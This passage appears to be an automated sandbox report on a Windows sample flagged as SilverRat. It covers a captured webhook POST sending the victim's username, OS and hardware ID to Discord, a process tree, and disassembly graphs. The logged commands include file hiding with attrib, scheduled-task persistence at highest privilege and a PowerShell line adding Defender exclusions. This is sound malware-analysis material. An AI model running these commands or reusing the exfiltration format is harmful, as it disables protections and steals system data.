                                                    2024-11-09 21:53:12 UTC415OUTData Raw: 75 73 65 72 6e 61 6d 65 3d 48 65 79 2b 41 44 4d 49 4e 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 67 2e 74 6f 70 34 74 6f 70 2e 69 6f 25 32 66 70 5f 32 35 32 32 63 37 77 38 75 31 2e 70 6e 67 26 63 6f 6e 74 65 6e 74 3d 59 6f 75 2b 68 61 76 65 2b 61 2b 63 6c 69 65 6e 74 2b 6f 6e 6c 69 6e 65 2b 6e 6f 77 2b 25 37 62 2b 4e 65 77 2b 25 37 64 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 55 73 65 72 6e 61 6d 65 2b 25 33 61 2b 65 6e 67 69 6e 65 65 72 25 34 30 38 32 30 30 39 34 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 53 79 73 74 65 6d 2b 25 33 61 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 25 30 61 2b 2b 25 65 32 25 39 63 25 38 35 2b 48 57 49 44 2b 25 33 61 2b 42 33 42 37 39 32 42 35 41 45 46 32
                                                    Data Ascii: username=Hey+ADMIN&avatar_url=https%3a%2f%2fg.top4top.io%2fp_2522c7w8u1.png&content=You+have+a+client+online+now+%7b+New+%7d%0a++%e2%9c%85+Username+%3a+user%40820094%0a++%e2%9c%85+System+%3a+Microsoft+Windows+10+Pro%0a++%e2%9c%85+HWID+%3a+B3B792B5AEF2
                                                    2024-11-09 21:53:12 UTC1369INHTTP/1.1 204 No Content
                                                    Date: Sat, 09 Nov 2024 21:53:12 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    Set-Cookie: __dcfduid=0440756c9ee511ef9dce22f671cd9b78; Expires=Thu, 08-Nov-2029 21:53:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                    strict-transport-security: max-age=31536000; includeSubDomains
                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                    x-ratelimit-limit: 5
                                                    x-ratelimit-remaining: 4
                                                    x-ratelimit-reset: 1731189194
                                                    x-ratelimit-reset-after: 1
                                                    via: 1.1 google
                                                    alt-svc: h3=":443"; ma=86400
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MR%2FJPhnTNICZUTqj7%2B2WyRWzGw7NIUlqeT5LR42PE9E7Y4Kdxdjxt0LYDxEdRrisXTpyKpscAPrv2vIk0Sct5A7sbh7Vqee0ywGL71bEUvsdzg8Z0ZN2cTubpfM7sDUQ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Set-Cookie: __sdcfduid=0440756c9ee511ef9dce22f671cd9b780982e4e6b29938b88e52212f8e311e7cc0541e339f89f1d4297bda8db9220e58; Expires=Thu, 08-Nov-2029 21:53:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                    Set-Cookie: __cf_bm=.n7orT0CeLB9_jwYWUnaH215jUop7bVehYTUYt_uzIc-1731189192-1.0.1.1-YU4rtnQ7wuVHDl5.IlJDPVfY.Xv87cvSZVkEoayK1_sioIHzzXiH98R.XKBrlOoxMQCvkJdgwk3UnMT6_1QnxQ; path=/; expires=Sat, 09-Nov-24 22:23:12 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                    Se
                                                    2024-11-09 21:53:12 UTC351INData Raw: 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 38 30 64 65 39 62 66 62 38 64 38 33 65 37 38 31 35 39 65 30 63 65 39 32 35 30 62 66 63 32 37 36 30 66 63 32 39 33 33 37 2d 31 37 33 31 31 38 39 31 39 32 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6c 7a 51 5f 65 76 6a 66 33 33 43 74 44 43 66 76 38 6d 39 57 72 6d 79 76 4e 56 69 64 61 46 69 49 77 43 41 47 6a 46 36 38 78 6e 63 2d 31 37 33 31 31 38 39 31 39 32 38 30 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f
                                                    Data Ascii: t-Cookie: __cfruid=80de9bfb8d83e78159e0ce9250bfc2760fc29337-1731189192; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=lzQ_evjf33CtDCfv8m9WrmyvNVidaFiIwCAGjF68xnc-1731189192800-0.0.1.1-604800000; path=/; domain=.disco


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:16:53:04
                                                    Start date:09/11/2024
                                                    Path:C:\Users\user\Desktop\RLesaPFXew.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\RLesaPFXew.exe"
                                                    Imagebase:0x1d0000
                                                    File size:46'592 bytes
                                                    MD5 hash:537B270C2278044E4C3958530F745ECE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: 00000000.00000000.2129565272.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: 00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\attrib.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java"
                                                    Imagebase:0x7ff7721d0000
                                                    File size:23'040 bytes
                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\attrib.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java\$77java.exe"
                                                    Imagebase:0x7ff7721d0000
                                                    File size:23'040 bytes
                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:10
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat""
                                                    Imagebase:0x7ff72bb10000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:16:53:07
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\timeout.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:timeout 3
                                                    Imagebase:0x7ff74dd30000
                                                    File size:32'768 bytes
                                                    MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:13
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Users\user\java\$77java.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\java\$77java.exe"
                                                    Imagebase:0x760000
                                                    File size:46'592 bytes
                                                    MD5 hash:537B270C2278044E4C3958530F745ECE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: C:\Users\user\java\$77java.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 66%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:false

                                                    General

                                                    Target ID:14
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"schtasks.exe" /query /TN $77java.exe
                                                    Imagebase:0x7ff6609c0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:15
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:16
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"schtasks.exe" /Create /SC ONCE /TN "$77java.exe" /TR "C:\Users\user\java\$77java.exe \"\$77java.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                                                    Imagebase:0x7ff6609c0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:17
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:18
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"schtasks.exe" /query /TN $77java.exe
                                                    Imagebase:0x7ff6609c0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                                                    Imagebase:0x7ff6e3d50000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:21
                                                    Start time:16:53:10
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:22
                                                    Start time:16:53:11
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "java_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
                                                    Imagebase:0x7ff6609c0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:23
                                                    Start time:16:53:11
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:24
                                                    Start time:16:53:11
                                                    Start date:09/11/2024
                                                    Path:C:\Users\user\java\$77java.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\java\$77java.exe "\$77java.exe" /AsAdmin
                                                    Imagebase:0x210000
                                                    File size:46'592 bytes
                                                    MD5 hash:537B270C2278044E4C3958530F745ECE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:25
                                                    Start time:16:53:13
                                                    Start date:09/11/2024
                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    Imagebase:0x7ff717f30000
                                                    File size:496'640 bytes
                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:18.9%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:53.8%
                                                      Total number of Nodes:13
                                                      Total number of Limit Nodes:0
                                                      execution_graph 2618 7ffd34697c15 2619 7ffd34697c1f 2618->2619 2620 7ffd34697ce6 NtSetValueKey 2619->2620 2621 7ffd34697d3f 2620->2621 2622 7ffd34697a99 2623 7ffd34697aa7 RegOpenKeyExW 2622->2623 2625 7ffd34697b8a 2623->2625 2630 7ffd34697c79 2633 7ffd34697c83 NtSetValueKey 2630->2633 2632 7ffd34697d3f 2633->2632 2626 7ffd34696820 2627 7ffd34696829 InternetGetConnectedState 2626->2627 2629 7ffd346968d3 2627->2629

                                                      Executed Functions

                                                      Function 00007FFD34697C15 Relevance: 1.7, APIs: 1, Instructions: 170COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 252 7ffd34697c15-7ffd34697c28 254 7ffd34697c2a 252->254 255 7ffd34697c83-7ffd34697c8a 252->255 256 7ffd34697c2c-7ffd34697c5a call 7ffd34696c10 254->256 257 7ffd34697c60-7ffd34697c75 254->257 258 7ffd34697c8c-7ffd34697cde 255->258 259 7ffd34697cc0-7ffd34697cde 255->259 267 7ffd34697c5f 256->267 257->255 260 7ffd34697ce6-7ffd34697d3d NtSetValueKey 258->260 259->260 265 7ffd34697d45-7ffd34697d62 260->265 266 7ffd34697d3f 260->266 266->265 267->257
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9fd8a9efe59ad994e993c81cbd99fe250a68d682a826e06e9fc91e899a4dc8af
                                                      • Instruction ID: d77582696c1b9a1021cf10b7990099c4193c2f8eea8dc048b4ddda62d3e13821
                                                      • Opcode Fuzzy Hash: 9fd8a9efe59ad994e993c81cbd99fe250a68d682a826e06e9fc91e899a4dc8af
                                                      • Instruction Fuzzy Hash: C3511771A0CB9C8FD718DF28D8956F5BBF0EF9A311F14426FD08DD3262C664A8468791
                                                      Function 00007FFD34697C79 Relevance: 1.6, APIs: 1, Instructions: 119nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 282 7ffd34697c79-7ffd34697c8a 284 7ffd34697c8c-7ffd34697cde 282->284 285 7ffd34697cc0-7ffd34697cde 282->285 286 7ffd34697ce6-7ffd34697d3d NtSetValueKey 284->286 285->286 288 7ffd34697d45-7ffd34697d62 286->288 289 7ffd34697d3f 286->289 289->288
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID: Value
                                                      • String ID:
                                                      • API String ID: 3702945584-0
                                                      • Opcode ID: c2b522cf19dec30e0cc577e3a41ad1977b8529c5f5dd2be870cd4377ee3298ec
                                                      • Instruction ID: 8353e3d8f5ab89e94d8171ecf796616611c6826855f71e2c54300940140a62d2
                                                      • Opcode Fuzzy Hash: c2b522cf19dec30e0cc577e3a41ad1977b8529c5f5dd2be870cd4377ee3298ec
                                                      • Instruction Fuzzy Hash: 5D31E431A0CA4C8FDB58DF58D8466F97BE0FBA9321F10412FD049D3252D674A8468B81
                                                      Function 00007FFD346960C2 Relevance: .5, Instructions: 458COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 463 7ffd346960c2-7ffd346960cf 464 7ffd346960da-7ffd346961a7 463->464 465 7ffd346960d1-7ffd346960d9 463->465 469 7ffd346961a9-7ffd346961b2 464->469 470 7ffd34696213 464->470 465->464 469->470 471 7ffd346961b4-7ffd346961c0 469->471 472 7ffd34696215-7ffd3469623a 470->472 473 7ffd346961f9-7ffd34696211 471->473 474 7ffd346961c2-7ffd346961d4 471->474 478 7ffd346962a6 472->478 479 7ffd3469623c-7ffd34696245 472->479 473->472 476 7ffd346961d6 474->476 477 7ffd346961d8-7ffd346961eb 474->477 476->477 477->477 480 7ffd346961ed-7ffd346961f5 477->480 482 7ffd346962a8-7ffd346962cd 478->482 479->478 481 7ffd34696247-7ffd34696253 479->481 480->473 483 7ffd34696255-7ffd34696267 481->483 484 7ffd3469628c-7ffd346962a4 481->484 489 7ffd3469633b 482->489 490 7ffd346962cf-7ffd346962d9 482->490 485 7ffd34696269 483->485 486 7ffd3469626b-7ffd3469627e 483->486 484->482 485->486 486->486 488 7ffd34696280-7ffd34696288 486->488 488->484 491 7ffd3469633d-7ffd3469636b 489->491 490->489 492 7ffd346962db-7ffd346962e8 490->492 499 7ffd346963db 491->499 500 7ffd3469636d-7ffd34696378 491->500 493 7ffd346962ea-7ffd346962fc 492->493 494 7ffd34696321-7ffd34696339 492->494 495 7ffd346962fe 493->495 496 7ffd34696300-7ffd34696313 493->496 494->491 495->496 496->496 498 7ffd34696315-7ffd3469631d 496->498 498->494 501 7ffd346963dd-7ffd346964b5 499->501 500->499 502 7ffd3469637a-7ffd34696388 500->502 512 7ffd346964bb-7ffd346964ca 501->512 503 7ffd3469638a-7ffd3469639c 502->503 504 7ffd346963c1-7ffd346963d9 502->504 506 7ffd3469639e 503->506 507 7ffd346963a0-7ffd346963b3 503->507 504->501 506->507 507->507 509 7ffd346963b5-7ffd346963bd 507->509 509->504 513 7ffd346964cc 512->513 514 7ffd346964d2-7ffd34696534 call 7ffd34696550 512->514 513->514 521 7ffd34696536 514->521 522 7ffd3469653b-7ffd3469654f 514->522 521->522
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5c2689518fc686edf0bd69d9cb585db26ad17e6eaf5e7bb543d96e494da31652
                                                      • Instruction ID: 0415d64036107b1ba76ffbb53ceb7c498e3209f25adf7578b4f02b1b0775d1ad
                                                      • Opcode Fuzzy Hash: 5c2689518fc686edf0bd69d9cb585db26ad17e6eaf5e7bb543d96e494da31652
                                                      • Instruction Fuzzy Hash: BFE19430A0CA8E8FEBA8DF28C8657E977D1FF55310F14426ED84DC72A1DB78A9458781
                                                      Function 00007FFD34697A99 Relevance: 1.6, APIs: 1, Instructions: 136registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 269 7ffd34697a99-7ffd34697aa5 270 7ffd34697aa7 269->270 271 7ffd34697aa9-7ffd34697aba 269->271 270->271 272 7ffd34697ae9-7ffd34697aef 270->272 273 7ffd34697abc-7ffd34697ae6 271->273 274 7ffd34697af0-7ffd34697b36 271->274 272->274 273->272 278 7ffd34697b38-7ffd34697b3d 274->278 279 7ffd34697b40-7ffd34697b88 RegOpenKeyExW 274->279 278->279 280 7ffd34697b8a 279->280 281 7ffd34697b90-7ffd34697baf 279->281 280->281
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: e2a714aaa8e4fee38200da61c8f7037c1336e9e92db5a0ecd16fbc2875187eec
                                                      • Instruction ID: ea47fb810b42c4dbaa4aafc3d603e7308ea1efe941ab28e980451e5f5b436b34
                                                      • Opcode Fuzzy Hash: e2a714aaa8e4fee38200da61c8f7037c1336e9e92db5a0ecd16fbc2875187eec
                                                      • Instruction Fuzzy Hash: 3541B37190CB588FDB18DF9898956F97BF0FBA9311F04426FD08DD3252CAB4A805CB92
                                                      Function 00007FFD34696820 Relevance: 1.6, APIs: 1, Instructions: 114networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 291 7ffd34696820-7ffd34696827 292 7ffd34696829-7ffd34696831 291->292 293 7ffd34696832-7ffd3469683a 291->293 292->293 294 7ffd3469683c-7ffd3469686c 293->294 295 7ffd34696870-7ffd346968d1 InternetGetConnectedState 293->295 294->295 298 7ffd346968d9-7ffd34696900 295->298 299 7ffd346968d3 295->299 299->298
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID: ConnectedInternetState
                                                      • String ID:
                                                      • API String ID: 97057780-0
                                                      • Opcode ID: 1a867958a92c657e9657850eeeeff7c9e9451ba105f24d2998d1d19072f75b73
                                                      • Instruction ID: 9ade69bf2a0fcc23b643886eade9cbb411fb0ab9a0ae0f8750b0171dd0400523
                                                      • Opcode Fuzzy Hash: 1a867958a92c657e9657850eeeeff7c9e9451ba105f24d2998d1d19072f75b73
                                                      • Instruction Fuzzy Hash: 49310131A0C61C8FEB58DF98D8957E97BE1EB66320F04016FD049D3192DB74A846CBA1

                                                      Non-executed Functions

                                                      Function 00007FFD34695316 Relevance: .5, Instructions: 472COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ab71d4494af701d5547f1aa7d8d38c2a44d02fe3945942b00580e752095c9a8c
                                                      • Instruction ID: bce6672a1183edc75397dcdddfce1f419712f4a7074743915f5187477688b624
                                                      • Opcode Fuzzy Hash: ab71d4494af701d5547f1aa7d8d38c2a44d02fe3945942b00580e752095c9a8c
                                                      • Instruction Fuzzy Hash: 00F18531A0CA8D8FEBA8DF28C8657E937E1FF55311F04426EE84DC7291DB7899458B81
                                                      Function 00007FFD34691958 Relevance: .3, Instructions: 265COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2161436496.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd34690000_RLesaPFXew.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62b1d1dbc277cdc128df9012821dae6e268e64d068c784659a2dd02360647477
                                                      • Instruction ID: d86361d57b1d83938256a0efcaa0a2adcc45dc89aa3e38642bb1e24dbd4f0b6f
                                                      • Opcode Fuzzy Hash: 62b1d1dbc277cdc128df9012821dae6e268e64d068c784659a2dd02360647477
                                                      • Instruction Fuzzy Hash: 5C916257A0E7D21EE7536A7868F50E63F60DF5326971D01E7C2C4CB0A3ED0C284A9262

                                                      Execution Graph

                                                      Execution Coverage:19.5%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:6
                                                      Total number of Limit Nodes:0

                                                      Executed Functions

                                                      Function 00007FFD3468A188 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
